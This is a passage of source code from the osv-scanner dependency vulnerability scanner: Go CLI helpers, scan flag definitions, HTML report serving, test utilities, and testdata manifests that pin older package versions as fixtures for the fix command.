client.ResolutionClient, currRes *resolution.Result, opts osvFixOptions) relockPatchMsg { patches, err := remediation.ComputeRelaxPatches(ctx, cl, currRes, opts.Options) if err != nil { return relockPatchMsg{err: err} } return relockPatchMsg{patches: patches} } ================================================ FILE: cmd/osv-scanner/fix/testdata/in-place-npm/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: cmd/osv-scanner/fix/testdata/override-maven/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: cmd/osv-scanner/fix/testdata/override-maven/pom.xml ================================================ 4.0.0 dev.osv osv-fix 1 4.0 org.jsoup jsoup 1.14.1 org.apache.httpcomponents httpclient ${httpclient.version} org.apache.maven.wagon wagon-http 3.0.0 org.codehaus.plexus plexus-utils 3.0 ================================================ FILE: cmd/osv-scanner/fix/testdata/relax-npm/package.json ================================================ { "name": "osv-fix", "version": "1.0.0", "description": "", "main": "index.js", "scripts": { "test": "echo \"Error: no test specified\" && exit 1" }, "author": "", "license": "ISC", "dependencies": { "npm-registry-client": "6.2.0" } } ================================================ FILE: cmd/osv-scanner/fix/testmain_test.go ================================================ package fix_test import ( "log/slog" "testing" "github.com/google/osv-scanner/v2/cmd/osv-scanner/fix" "github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/cmd" "github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/testcmd" "github.com/google/osv-scanner/v2/internal/config" "github.com/google/osv-scanner/v2/internal/testlogger" "github.com/google/osv-scanner/v2/internal/testutility" ) func TestMain(m *testing.M) { config.OSVScannerConfigName = "osv-scanner-test.toml" slog.SetDefault(slog.New(testlogger.New())) testcmd.CommandsUnderTest = []cmd.CommandBuilder{fix.Command} m.Run() testutility.CleanSnapshots(m) } ================================================ FILE: cmd/osv-scanner/internal/cmd/__snapshots__/helpers_test.snap ================================================ [Test_insertDefaultCommand - 1] --- [Test_insertDefaultCommand - 2] --- [Test_insertDefaultCommand - 3] --- [Test_insertDefaultCommand - 4] --- [Test_insertDefaultCommand - 5] --- [Test_insertDefaultCommand - 6] Warning: `helpers.go` exists as both a subcommand of OSV-Scanner and as a file on the filesystem. `helpers.go` is assumed to be a subcommand here. If you intended for `helpers.go` to be an argument to `default`, you must specify `default helpers.go` in your command line. --- [Test_insertDefaultCommand - 7] --- [Test_insertDefaultCommand - 8] --- [Test_insertDefaultCommand - 9] --- [Test_insertDefaultCommand - 10] --- [Test_insertDefaultCommand - 11] --- [Test_insertDefaultCommand - 12] --- [Test_insertDefaultCommand - 13] --- [Test_insertDefaultCommand - 14] --- [Test_insertDefaultCommand - 15] --- [Test_insertDefaultCommand - 16] --- ================================================ FILE: cmd/osv-scanner/internal/cmd/helpers.go ================================================ // Package cmd provides helper functions for the osv-scanner CLI commands. package cmd import ( "fmt" "io" "os" "slices" "github.com/google/osv-scanner/v2/cmd/osv-scanner/scan" "github.com/urfave/cli/v3" ) func getCustomHelpTemplate() string { return ` NAME: {{.Name}} - {{.Usage}} USAGE: {{.Name}} {{if .VisibleFlags}}[global options]{{end}}{{if .Commands}} command [command options]{{end}} EXAMPLES: # Scan a source directory $ {{.Name}} scan source -r # Scan a source directory in offline mode $ {{.Name}} scan source --offline-vulnerabilities --download-offline-database -r # Scan a container image $ {{.Name}} scan image # Scan a local image archive (e.g. a tar file) and generate HTML output $ {{.Name}} scan image --serve --archive # Fix vulnerabilities in a manifest file and lockfile (non-interactive mode) $ {{.Name}} fix -M -L For full usage details, please refer to the help command of each subcommand (e.g. {{.Name}} scan --help). Alternatively, you can access the detailed documentation here: https://google.github.io/osv-scanner/ VERSION: {{.Version}} COMMANDS: {{range .Commands}}{{if and (not .HideHelp) (not .Hidden)}} {{join .Names ", "}}{{ "\t"}}{{.Usage}}{{ "\n" }}{{end}}{{end}} {{if .VisibleFlags}} GLOBAL OPTIONS: {{range .VisibleFlags}} {{.}}{{end}} {{end}} ` } // Gets all valid commands and global options for OSV-Scanner. func getAllCommands(commands []*cli.Command) []string { // Adding all subcommands allCommands := make([]string, 0, len(commands)) for _, command := range commands { allCommands = append(allCommands, command.Name) } // Adding help command and help flags for _, flag := range cli.HelpFlag.Names() { allCommands = append(allCommands, flag) // help command allCommands = append(allCommands, "-"+flag) // help flag allCommands = append(allCommands, "--"+flag) // help flag } // Adding version flags for _, flag := range cli.VersionFlag.Names() { allCommands = append(allCommands, "-"+flag) allCommands = append(allCommands, "--"+flag) } return allCommands } // warnIfCommandAmbiguous warns the user if the command they are trying to run // exists as both a subcommand and as a file on the filesystem. // If this is the case, the command is assumed to be a subcommand. func warnIfCommandAmbiguous(command, defaultCommand string, stderr io.Writer) { if _, err := os.Stat(command); err == nil { // todo this should be using slog.Warn, maybe... fmt.Fprintf(stderr, "Warning: `%[1]s` exists as both a subcommand of OSV-Scanner and as a file on the filesystem. "+ "`%[1]s` is assumed to be a subcommand here. If you intended for `%[1]s` to be an argument to `%[2]s`, "+ "you must specify `%[2]s %[1]s` in your command line.\n", command, defaultCommand) } } // Inserts the default command to args if no command is specified. func insertDefaultCommand(args []string, commands []*cli.Command, defaultCommand string, stderr io.Writer) []string { // Do nothing if no command or file name is provided. if len(args) < 2 { return args } allCommands := getAllCommands(commands) command := args[1] // If no command is provided, use the default command and subcommand. if !slices.Contains(allCommands, command) { // Avoids modifying args in-place, as some unit tests rely on its original value for multiple calls. argsTmp := make([]string, len(args)+2) copy(argsTmp[3:], args[1:]) argsTmp[1] = defaultCommand // Set the default subCommand of Scan argsTmp[2] = scan.DefaultSubcommand // Executes the cli app with the new args. return argsTmp } warnIfCommandAmbiguous(command, defaultCommand, stderr) // If only the default command is provided without its subcommand, append the subcommand. if command == defaultCommand { if len(args) < 3 { // Indicates that only "osv-scanner scan" was provided, without a subcommand or filename return args } subcommand := args[2] // Default to the "source" subcommand if none is provided. if !slices.Contains(scan.Subcommands, subcommand) { argsTmp := make([]string, len(args)+1) copy(argsTmp[3:], args[2:]) argsTmp[1] = defaultCommand argsTmp[2] = scan.DefaultSubcommand return argsTmp } // Print a warning message if subcommand exist on the filesystem. warnIfCommandAmbiguous(subcommand, scan.DefaultSubcommand, stderr) } return args } ================================================ FILE: cmd/osv-scanner/internal/cmd/helpers_test.go ================================================ package cmd import ( "bytes" "log/slog" "reflect" "testing" "github.com/google/osv-scanner/v2/internal/cmdlogger" "github.com/google/osv-scanner/v2/internal/testutility" "github.com/urfave/cli/v3" ) func Test_insertDefaultCommand(t *testing.T) { t.Parallel() commands := []*cli.Command{ {Name: "default"}, {Name: "helpers.go"}, {Name: "scan"}, } defaultCommand := "default" tests := []struct { originalArgs []string wantArgs []string }{ // test when default command is specified { originalArgs: []string{"", "default", "file"}, wantArgs: []string{"", "default", "source", "file"}, }, // test when command is not specified { originalArgs: []string{"", "file"}, wantArgs: []string{"", "default", "source", "file"}, }, // test when command is also a filename { originalArgs: []string{"", "helpers.go"}, wantArgs: []string{"", "helpers.go"}, }, // test when subcommand is also a filename { originalArgs: []string{"", "default", "image"}, wantArgs: []string{"", "default", "image"}, }, // test when command is not valid { originalArgs: []string{"", "invalid"}, wantArgs: []string{"", "default", "source", "invalid"}, }, // test when command is a built-in option { originalArgs: []string{"", "--version"}, wantArgs: []string{"", "--version"}, }, { originalArgs: []string{"", "-h"}, wantArgs: []string{"", "-h"}, }, { originalArgs: []string{"", "help"}, wantArgs: []string{"", "help"}, }, } for _, tt := range tests { stdout := &bytes.Buffer{} stderr := &bytes.Buffer{} logger := cmdlogger.New(stdout, stderr) slog.SetDefault(slog.New(logger)) argsActual := insertDefaultCommand(tt.originalArgs, commands, defaultCommand, stderr) if !reflect.DeepEqual(argsActual, tt.wantArgs) { t.Errorf("Test Failed. Details:\n"+ "Args (Got): %s\n"+ "Args (Want): %s\n", argsActual, tt.wantArgs) } testutility.NewSnapshot().MatchText(t, stdout.String()) testutility.NewSnapshot().MatchText(t, stderr.String()) } } ================================================ FILE: cmd/osv-scanner/internal/cmd/run.go ================================================ package cmd import ( "context" "errors" "io" "log/slog" "net/http" "testing" scalibr "github.com/google/osv-scalibr/version" "github.com/google/osv-scanner/v2/internal/cmdlogger" "github.com/google/osv-scanner/v2/internal/testlogger" "github.com/google/osv-scanner/v2/internal/version" "github.com/google/osv-scanner/v2/pkg/osvscanner" "github.com/urfave/cli/v3" ) var ( commit = "n/a" date = "n/a" ) type CommandBuilder = func(stdout, stderr io.Writer, client *http.Client) *cli.Command func Run(args []string, stdout, stderr io.Writer, client *http.Client, commands []CommandBuilder) int { // --- Setup Logger --- logHandler := cmdlogger.New(stdout, stderr) // If in testing mode, set logger via Handler // Otherwise, set default global logger if testing.Testing() { handler, ok := slog.Default().Handler().(*testlogger.Handler) if !ok { panic("Test failed to initialize default logger with Handler") } handler.AddInstance(logHandler) defer handler.Delete() } else { slog.SetDefault(slog.New(logHandler)) } // --- cli.HelpPrinter = func(w io.Writer, templ string, data any) { cmdlogger.SetHasErrored() cli.HelpPrinterCustom(w, templ, data, nil) } cli.VersionPrinter = func(cmd *cli.Command) { cmdlogger.Infof("osv-scanner version: %s", cmd.Version) cmdlogger.Infof("osv-scalibr version: %s", scalibr.ScannerVersion) cmdlogger.Infof("commit: %s", commit) cmdlogger.Infof("built at: %s", date) } cmds := make([]*cli.Command, 0, len(commands)) for _, cmd := range commands { cmds = append(cmds, cmd(stdout, stderr, client)) } app := &cli.Command{ Name: "osv-scanner", Version: version.OSVVersion, Usage: "scans various mediums for dependencies and checks them against the OSV database", Suggest: true, Writer: stdout, ErrWriter: stderr, DefaultCommand: "scan", Commands: cmds, CustomRootCommandHelpTemplate: getCustomHelpTemplate(), } // If ExitErrHandler is not set, cli will use the default cli.HandleExitCoder. // This is not ideal as cli.HandleExitCoder checks if the error implements cli.ExitCode interface. // // 99% of the time, this is fine, as we do not implement cli.ExitCode in our errors, so errors pass through // that handler untouched. // However, because of Go's duck typing, any error that happens to have a ExitCode() function // (e.g. *exec.ExitError) will be assumed to implement cli.ExitCode interface and cause the program to exit // early without proper error handling. // // This removes the handler entirely so that behavior will not unexpectedly happen. app.ExitErrHandler = func(_ context.Context, _ *cli.Command, _ error) {} args = insertDefaultCommand(args, app.Commands, app.DefaultCommand, stderr) err := app.Run(context.Background(), args) // if the config is invalid, it's possible that is why any other errors // happened so that exit code takes priority if logHandler.HasErroredBecauseInvalidConfig() { return 130 } if err != nil { switch { case errors.Is(err, osvscanner.ErrVulnerabilitiesFound): return 1 case errors.Is(err, osvscanner.ErrNoPackagesFound): cmdlogger.Errorf("No package sources found, --help for usage information.") return 128 case errors.Is(err, osvscanner.ErrAPIFailed): cmdlogger.Errorf("%v", err) return 129 } cmdlogger.Errorf("%v", err) } // if we've been told to print an error, and not already exited with // a specific error code, then exit with a generic non-zero code if logHandler.HasErrored() { return 127 } return 0 } ================================================ FILE: cmd/osv-scanner/internal/cmd/testmain_test.go ================================================ package cmd import ( "testing" "github.com/google/osv-scanner/v2/internal/testutility" ) func TestMain(m *testing.M) { m.Run() testutility.CleanSnapshots(m) } ================================================ FILE: cmd/osv-scanner/internal/helper/callanalysis_parser.go ================================================ package helper var stableCallAnalysisStates = map[string]bool{ "go": true, "rust": false, "jar": false, } // CreateCallAnalysisStates creates a map to record if languages are enabled or disabled for call analysis func CreateCallAnalysisStates(enabledCallAnalysis []string, disabledCallAnalysis []string) map[string]bool { callAnalysisStates := make(map[string]bool) for _, language := range enabledCallAnalysis { callAnalysisStates[language] = true } for _, language := range disabledCallAnalysis { callAnalysisStates[language] = false } enableAll, containsAll := callAnalysisStates["all"] for language, isStable := range stableCallAnalysisStates { if _, exists := callAnalysisStates[language]; !exists { callAnalysisStates[language] = isStable || enableAll } if containsAll && !enableAll { callAnalysisStates[language] = false } } delete(callAnalysisStates, "all") return callAnalysisStates } ================================================ FILE: cmd/osv-scanner/internal/helper/callanalysis_parser_test.go ================================================ package helper import ( "reflect" "testing" ) func TestCreateCallAnalysisStates(t *testing.T) { t.Parallel() testCases := []struct { enabledCallAnalysis []string disabledCallAnalysis []string expectedCallAnalysisStates map[string]bool }{ { enabledCallAnalysis: []string{"go", "rust"}, disabledCallAnalysis: []string{}, expectedCallAnalysisStates: map[string]bool{ "go": true, "rust": true, "jar": false, }, }, { enabledCallAnalysis: []string{"all"}, disabledCallAnalysis: []string{"rust"}, expectedCallAnalysisStates: map[string]bool{ "go": true, "rust": false, "jar": true, }, }, { enabledCallAnalysis: []string{}, disabledCallAnalysis: []string{"all"}, expectedCallAnalysisStates: map[string]bool{ "go": false, "rust": false, "jar": false, }, }, { enabledCallAnalysis: []string{}, disabledCallAnalysis: []string{"rust"}, expectedCallAnalysisStates: map[string]bool{ "go": true, "rust": false, "jar": false, }, }, { enabledCallAnalysis: []string{"all", "rust"}, disabledCallAnalysis: []string{"go"}, expectedCallAnalysisStates: map[string]bool{ "go": false, "rust": true, "jar": true, }, }, } for _, testCase := range testCases { actualCallAnalysisStates := CreateCallAnalysisStates(testCase.enabledCallAnalysis, testCase.disabledCallAnalysis) if !reflect.DeepEqual(actualCallAnalysisStates, testCase.expectedCallAnalysisStates) { t.Errorf("expected call analysis states to be %v, but got %v", testCase.expectedCallAnalysisStates, actualCallAnalysisStates) } } } ================================================ FILE: cmd/osv-scanner/internal/helper/flags.go ================================================ package helper import ( "context" "fmt" "slices" "strings" "github.com/google/osv-scanner/v2/internal/cmdlogger" "github.com/google/osv-scanner/v2/internal/reporter" "github.com/urfave/cli/v3" ) // offlineFlags is a map of flags which require network access to operate, // with the values to set them to in order to disable them var offlineFlags = map[string]string{ "offline-vulnerabilities": "true", "no-resolve": "true", } // a "boolean or list" flag whose presence indicates a summary of licenses should // be printed, and whose (optional) value will be a comma-delimited list of licenses // that should be considered allowed type allowedLicencesFlag struct { allowlist []string } func (g *allowedLicencesFlag) Get() any { return g } func (g *allowedLicencesFlag) Set(value string) error { if value == "" || value == "false" || value == "true" { g.allowlist = nil } else { g.allowlist = strings.Split(value, ",") } return nil } // IsBoolFlag indicates that it is valid to use this flag in a boolean context // and is what lets us accept both enable/disable and list-of-licenses values func (g *allowedLicencesFlag) IsBoolFlag() bool { return true } func (g *allowedLicencesFlag) String() string { return strings.Join(g.allowlist, ",") } // BuildCommonScanFlags returns a slice of flags which are common to all scan (sub)commands func BuildCommonScanFlags(defaultExtractors []string) []cli.Flag { return []cli.Flag{ &cli.StringFlag{ Name: "config", Usage: "set/override config file", TakesFile: true, }, &cli.StringFlag{ Name: "format", Aliases: []string{"f"}, Usage: "sets the output format; value can be: " + strings.Join(reporter.Format(), ", "), Value: "table", Action: func(_ context.Context, _ *cli.Command, s string) error { if slices.Contains(reporter.Format(), s) { return nil } return fmt.Errorf("unsupported output format \"%s\" - must be one of: %s", s, strings.Join(reporter.Format(), ", ")) }, // todo: ideally this should be an action, but we need to ensure it is done first // currently for some reason flag actions are not always invoked in the same order Validator: func(s string) error { if slices.Contains(reporter.Format(), s) && (s != "vertical" && s != "table" && s != "markdown") { cmdlogger.SendEverythingToStderr() } return nil }, }, &cli.BoolFlag{ Name: "serve", Usage: "output as HTML result and serve it locally", }, &cli.StringFlag{ Name: "port", Usage: "port number to use when serving HTML report (default: 8000)", Action: func(_ context.Context, _ *cli.Command, p string) error { servePort = p return nil }, }, &cli.StringFlag{ Name: "output", Usage: "[DEPRECATED] (Use \"--output-file\" instead) saves the result to the given file path", TakesFile: true, Action: func(_ context.Context, _ *cli.Command, _ string) error { cmdlogger.Warnf("Warning: --output has been deprecated in favor of --output-file") return nil }, }, &cli.StringFlag{ Name: "output-file", Usage: "saves the result to the given file path", TakesFile: true, }, &cli.StringFlag{ Name: "verbosity", Usage: "specify the level of information that should be provided during runtime; value can be: " + strings.Join(cmdlogger.Levels(), ", "), Value: "info", Action: func(_ context.Context, _ *cli.Command, s string) error { lvl, err := cmdlogger.ParseLevel(s) if err != nil { return err } cmdlogger.SetLevel(lvl) return nil }, }, &cli.BoolFlag{ Name: "offline", Usage: "run in offline mode, disabling any features requiring network access", Action: func(_ context.Context, cmd *cli.Command, b bool) error { if !b { return nil } // Disable the features requiring network access. for flag, value := range offlineFlags { // TODO(michaelkedar): do something if the flag was already explicitly set. // Skip setting the flag if the current command doesn't have it. if !slices.ContainsFunc(cmd.Flags, func(f cli.Flag) bool { return slices.Contains(f.Names(), flag) }) { continue } if err := cmd.Set(flag, value); err != nil { panic(fmt.Sprintf("failed setting offline flag %s to %s: %v", flag, value, err)) } } return nil }, }, &cli.BoolFlag{ Name: "offline-vulnerabilities", Usage: "checks for vulnerabilities using local databases that are already cached", }, &cli.BoolFlag{ Name: "download-offline-databases", Usage: "downloads vulnerability databases for offline comparison", }, &cli.StringFlag{ Name: "local-db-path", Usage: "sets the path that local databases should be stored", Hidden: true, }, &cli.StringSliceFlag{ Name: "call-analysis", Usage: "Enable call analysis for specific languages (e.g. --call-analysis=go). Supported: go, rust (*). (*) Will run build scripts.", }, &cli.StringSliceFlag{ Name: "no-call-analysis", Usage: "disables call graph analysis", }, &cli.BoolFlag{ Name: "no-resolve", Usage: "disable transitive dependency resolution of manifest files", }, &cli.BoolFlag{ Name: "allow-no-lockfiles", Usage: "has the scanner consider no lockfiles being found as ok", }, &cli.BoolFlag{ Name: "all-packages", Usage: "when json output is selected, prints all packages", }, &cli.BoolFlag{ Name: "all-vulns", Usage: "show all vulnerabilities including unimportant and uncalled ones", }, &cli.GenericFlag{ Name: "licenses", Usage: "report on licenses based on an allowlist", Value: &allowedLicencesFlag{}, }, &cli.BoolFlag{ Name: "experimental-flag-deprecated-packages", Usage: "report if package versions are deprecated", }, &cli.StringSliceFlag{ Name: "experimental-plugins", Usage: "list of specific plugins and presets of plugins to use", Value: defaultExtractors, }, &cli.StringSliceFlag{ Name: "experimental-disable-plugins", Usage: "list of specific plugins and presets of plugins to not use", }, &cli.BoolFlag{ Name: "experimental-no-default-plugins", Usage: "disable default plugins, instead using only those enabled by --experimental-plugins", }, } } ================================================ FILE: cmd/osv-scanner/internal/helper/getters.go ================================================ package helper import ( "fmt" "net/http" "strings" "github.com/google/osv-scanner/v2/internal/spdx" "github.com/google/osv-scanner/v2/pkg/osvscanner" "github.com/urfave/cli/v3" ) func GetScanLicensesAllowlist(cmd *cli.Command) ([]string, error) { if !cmd.IsSet("licenses") { return []string{}, nil } allowlist := cmd.Generic("licenses").(*allowedLicencesFlag).allowlist if len(allowlist) == 0 { return []string{}, nil } if unrecognized := spdx.Unrecognized(allowlist); len(unrecognized) > 0 { return nil, fmt.Errorf("--licenses requires comma-separated spdx licenses. The following license(s) are not recognized as spdx: %s", strings.Join(unrecognized, ",")) } if cmd.Bool("offline") { allowlist = []string{} } return allowlist, nil } func GetCommonScannerActions(cmd *cli.Command, scanLicensesAllowlist []string) osvscanner.ScannerActions { callAnalysisStates := CreateCallAnalysisStates(cmd.StringSlice("call-analysis"), cmd.StringSlice("no-call-analysis")) return osvscanner.ScannerActions{ IncludeGitRoot: cmd.Bool("include-git-root"), ConfigOverridePath: cmd.String("config"), ShowAllPackages: cmd.Bool("all-packages"), ShowAllVulns: cmd.Bool("all-vulns"), CompareOffline: cmd.Bool("offline-vulnerabilities"), DownloadDatabases: cmd.Bool("download-offline-databases"), LocalDBPath: cmd.String("local-db-path"), ScanLicensesSummary: cmd.IsSet("licenses"), ScanLicensesAllowlist: scanLicensesAllowlist, CallAnalysisStates: callAnalysisStates, } } func GetExperimentalScannerActions(cmd *cli.Command, client *http.Client) osvscanner.ExperimentalScannerActions { return osvscanner.ExperimentalScannerActions{ PluginsEnabled: cmd.StringSlice("experimental-plugins"), PluginsDisabled: cmd.StringSlice("experimental-disable-plugins"), PluginsNoDefaults: cmd.Bool("experimental-no-default-plugins"), HTTPClient: client, FlagDeprecatedPackages: cmd.Bool("experimental-flag-deprecated-packages"), } } ================================================ FILE: cmd/osv-scanner/internal/helper/misc.go ================================================ // Package helper provides helper functions for the osv-scanner CLI. package helper import ( "fmt" "io" "net/http" "os" "time" "github.com/google/osv-scanner/v2/internal/cmdlogger" "github.com/google/osv-scanner/v2/internal/reporter" "github.com/google/osv-scanner/v2/pkg/models" "golang.org/x/term" ) // sets default port(8000) as a global variable var ( servePort = "8000" // default port ) // ServeHTML serves the single HTML file for remote accessing. // The program will keep running to serve the HTML report on localhost // until the user manually terminates it (e.g. using Ctrl+C). func ServeHTML(outputPath string) { localhostURL := fmt.Sprintf("http://localhost:%s/", servePort) cmdlogger.Infof("Serving HTML report at %s", localhostURL) cmdlogger.Infof("If you are accessing remotely, use the following SSH command:") cmdlogger.Infof("`ssh -L local_port:destination_server_ip:%s ssh_server_hostname`", servePort) server := &http.Server{ Addr: ":" + servePort, Handler: http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { http.ServeFile(w, r, outputPath) }), ReadHeaderTimeout: 3 * time.Second, } if err := server.ListenAndServe(); err != nil { cmdlogger.Errorf("Failed to start server: %v", err) } } func PrintResult(stdout, stderr io.Writer, outputPath, format string, diffVulns *models.VulnerabilityResults, showAllVulns bool) error { termWidth := 0 var err error if outputPath != "" { // Output is definitely a file stdout, err = os.Create(outputPath) if err != nil { return fmt.Errorf("failed to create output file: %w", err) } } else { // Output might be a terminal if stdoutAsFile, ok := stdout.(*os.File); ok { termWidth, _, err = term.GetSize(int(stdoutAsFile.Fd())) if err != nil { // If output is not a terminal, termWidth = 0 } } } writer := stdout if format == "gh-annotations" { writer = stderr } return reporter.PrintResult(diffVulns, format, writer, termWidth, showAllVulns) } ================================================ FILE: cmd/osv-scanner/internal/testcmd/case.go ================================================ // Package testcmd provides utilities for testing osv-scanner CLI commands. package testcmd import ( "net/http" "strings" "github.com/google/osv-scanner/v2/internal/testutility" ) type Case struct { Name string Args []string Exit int // ReplaceRules are only used for JSON output ReplaceRules []testutility.JSONReplaceRule HTTPClient *http.Client } // findFirstValueOfFlag returns the value of the first instance of the given flag // in the test case arguments, if it is present at all func (c Case) findFirstValueOfFlag(f string) string { for i, arg := range c.Args { if after, ok := strings.CutPrefix(arg, f+"="); ok { return after } if arg == f && i < len(c.Args) { return c.Args[i+1] } } return "" } ================================================ FILE: cmd/osv-scanner/internal/testcmd/copy.go ================================================ package testcmd import ( "fmt" "os" "path/filepath" "strings" "testing" ) func copyFile(from, to string) (string, error) { b, err := os.ReadFile(from) if err != nil { return "", fmt.Errorf("could not read test file: %w", err) } if err := os.WriteFile(to, b, 0600); err != nil { return "", fmt.Errorf("could not copy test file: %w", err) } return to, nil } // CopyFileFlagTo creates a copy of the file pointed to by the given flag (if present // in the test case arguments) in the given directory, updating all references // in the arguments before returning the new path. // // Values that include "does_not_exist" are assumed to be for testing when the // flag is given the path to a file or directory that does not exist, and so // are ignored as if the flag was not given a value at all func CopyFileFlagTo(t *testing.T, tc Case, flagName string, dir string) string { t.Helper() flagValue := tc.findFirstValueOfFlag(flagName) if flagValue == "" || strings.Contains(flagValue, "does_not_exist") { return "" } newPath, err := copyFile(flagValue, filepath.Join(dir, filepath.Base(flagValue))) if err != nil { t.Fatalf("%v", err) } for i := range tc.Args { tc.Args[i] = strings.ReplaceAll(tc.Args[i], flagValue, newPath) } return newPath } ================================================ FILE: cmd/osv-scanner/internal/testcmd/git.go ================================================ package testcmd import ( "io/fs" "os" "path/filepath" "github.com/go-git/go-git/v5" ) func SetupGitFixtures() (func(), error) { // ensure a git repository doesn't already exist in the testdata directory, // in case we didn't get a chance to clean-up properly in the last run os.RemoveAll("./testdata/.git") toRemove := []string{"./testdata/.git"} cleaner := func() { for _, p := range toRemove { os.RemoveAll(p) } } // temporarily make the testdata folder a git repository to prevent gitignore files messing with tests _, err := git.PlainInit("./testdata", false) if err != nil { return cleaner, err } var gitIgnoreFiles []string // walk the testdata to find all test .gitignore files that should be copied before tests run err = filepath.Walk("./testdata", func(path string, info fs.FileInfo, err error) error { if err == nil && !info.IsDir() && filepath.Base(path) == "test.gitignore" { gitIgnoreFiles = append(gitIgnoreFiles, path) } return nil }) if err != nil { return cleaner, err } for _, f := range gitIgnoreFiles { gitignoreFile, err := copyFile(f, filepath.Join(filepath.Dir(f), ".gitignore")) if err != nil { return cleaner, err } toRemove = append(toRemove, gitignoreFile) } return cleaner, nil } ================================================ FILE: cmd/osv-scanner/internal/testcmd/run.go ================================================ package testcmd import ( "bytes" "context" "encoding/json" "errors" "fmt" "io" "net/http" "sort" "strings" "testing" "github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/cmd" "github.com/google/osv-scanner/v2/internal/cachedregexp" "github.com/google/osv-scanner/v2/internal/testlogger" "github.com/google/osv-scanner/v2/internal/testutility" "github.com/urfave/cli/v3" ) // CommandsUnderTest should be set in TestMain by every cmd package test var CommandsUnderTest []cmd.CommandBuilder // fetchCommandsToTest returns the commands that should be tested, ensuring that // the default "scan" command is included to avoid a panic func fetchCommandsToTest() []cmd.CommandBuilder { for _, builder := range CommandsUnderTest { command := builder(nil, nil, nil) if command.Name == "scan" { return CommandsUnderTest } } return append(CommandsUnderTest, func(_, _ io.Writer, _ *http.Client) *cli.Command { return &cli.Command{ Name: "scan", Action: func(_ context.Context, _ *cli.Command) error { return errors.New("") }, } }) } func run(t *testing.T, tc Case) (string, string) { t.Helper() stdout := &bytes.Buffer{} stderr := &bytes.Buffer{} ec := cmd.Run(tc.Args, stdout, stderr, tc.HTTPClient, fetchCommandsToTest()) if ec != tc.Exit { t.Errorf("cli exited with code %d, not %d", ec, tc.Exit) t.Errorf("stdout: %s", stdout.String()) t.Errorf("stderr: %s", stderr.String()) } return stdout.String(), stderr.String() } func RunAndNormalize(t *testing.T, tc Case) (string, string) { t.Helper() stdout, stderr := run(t, tc) stdout = normalizeDirScanOrder(t, stdout) stderr = normalizeDirScanOrder(t, stderr) if len(tc.ReplaceRules) > 0 { if len(stdout) == 0 || !json.Valid([]byte(stdout)) { t.Fatalf("invalid JSON when expecting json\n stdout: %s\n stderr: %s", stdout, stderr) } stdout = normalizeJSON(t, stdout, tc.ReplaceRules...) } stdout = normalizeUUID(t, stdout) return stdout, stderr } func RunAndMatchSnapshots(t *testing.T, tc Case) { t.Helper() stdout, stderr := RunAndNormalize(t, tc) testutility.NewSnapshot().MatchText(t, stdout) testutility.NewSnapshot().WithWindowsReplacements(map[string]string{ "CreateFile": "stat", }).MatchText(t, stderr) } // normalizeJSON runs the given JSONReplaceRules on the given JSON input and returns the normalized JSON string func normalizeJSON(t *testing.T, jsonInput string, jsonReplaceRules ...testutility.JSONReplaceRule) string { t.Helper() for _, rule := range jsonReplaceRules { jsonInput = testutility.ReplaceJSONInput(t, jsonInput, rule.Path, rule.ReplaceFunc) } jsonFormatted := bytes.Buffer{} err := json.Indent(&jsonFormatted, []byte(jsonInput), "", " ") if err != nil { t.Fatalf("Failed to marshal JSON: %s", err) } return jsonFormatted.String() } // Sorts the output between directory scan markers to allow for consistent test results when doing unsorted dir walks func normalizeDirScanOrder(t *testing.T, input string) string { t.Helper() inputLines := strings.Split(input, "\n") var completeOutput = make([]string, 0, len(inputLines)) var dirScanHolder []string printingDirScanLogs := false for _, line := range inputLines { if strings.Contains(line, testlogger.BeginDirectoryScan) { if printingDirScanLogs { t.Fatalf("directory scan began twice before finishing?") } printingDirScanLogs = true continue } if strings.Contains(line, testlogger.EndDirectoryScan) { if !printingDirScanLogs { t.Fatalf("directory scan ended before starting?") } printingDirScanLogs = false sort.Strings(dirScanHolder) completeOutput = append(completeOutput, dirScanHolder...) dirScanHolder = nil continue } if printingDirScanLogs { dirScanHolder = append(dirScanHolder, line) continue } completeOutput = append(completeOutput, line) } return strings.Join(completeOutput, "\n") } // normalizeUUID normalizes each unique instance of uuid string into it's own placeholder, so relations are preserved. func normalizeUUID(t *testing.T, input string) string { t.Helper() uuidV4Regexp := cachedregexp.MustCompile( "[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-4[0-9a-fA-F]{3}-[89ABab][0-9a-fA-F]{3}-[0-9a-fA-F]{12}") uuidMapping := map[string]int{} allUUIDs := uuidV4Regexp.FindAllString(input, -1) for _, id := range allUUIDs { if _, ok := uuidMapping[id]; ok { continue } // Create a incrementing uuid mapping for each unique uuid we encounter uuidMapping[id] = len(uuidMapping) } replacerRules := make([]string, 0, len(uuidMapping)*2) for s, i := range uuidMapping { replacerRules = append(replacerRules, s, fmt.Sprintf("uuid-placeholder-%d", i)) } return strings.NewReplacer(replacerRules...).Replace(input) } ================================================ FILE: cmd/osv-scanner/internal/testcmd/vcr.go ================================================ package testcmd import ( "bytes" "cmp" "fmt" "io" "net/http" "os" "path/filepath" "reflect" "slices" "strings" "testing" "github.com/tidwall/pretty" "go.yaml.in/yaml/v4" "gopkg.in/dnaeon/go-vcr.v4/pkg/cassette" "gopkg.in/dnaeon/go-vcr.v4/pkg/recorder" ) func determineRecorderMode() recorder.Mode { switch strings.ToLower(os.Getenv("TEST_VCR_MODE")) { case "recordonly", "0": return recorder.ModeRecordOnly case "replayonly", "1": return recorder.ModeReplayOnly case "replaywithnewepisodes", "2": return recorder.ModeReplayWithNewEpisodes case "recordonce", "3": return recorder.ModeRecordOnce case "passthrough", "4": return recorder.ModePassthrough } if _, inCI := os.LookupEnv("CI"); inCI { return recorder.ModeReplayOnly } return recorder.ModeReplayWithNewEpisodes } // withHeadersTripper adds extra headers to requests before they're done by the wrapped http.Client type withHeadersTripper struct { wrapper http.Client headers map[string]string } func (wht withHeadersTripper) RoundTrip(request *http.Request) (*http.Response, error) { for key, value := range wht.headers { request.Header.Set(key, value) } return wht.wrapper.Do(request) } var _ http.RoundTripper = withHeadersTripper{} // WithTestNameHeader wraps the given http.Client with an http.RoundTripper that // adds a custom header to every request with the name of the test being run func WithTestNameHeader(t *testing.T, client http.Client) *http.Client { t.Helper() return &http.Client{Transport: withHeadersTripper{ wrapper: client, headers: map[string]string{"X-Test-Name": 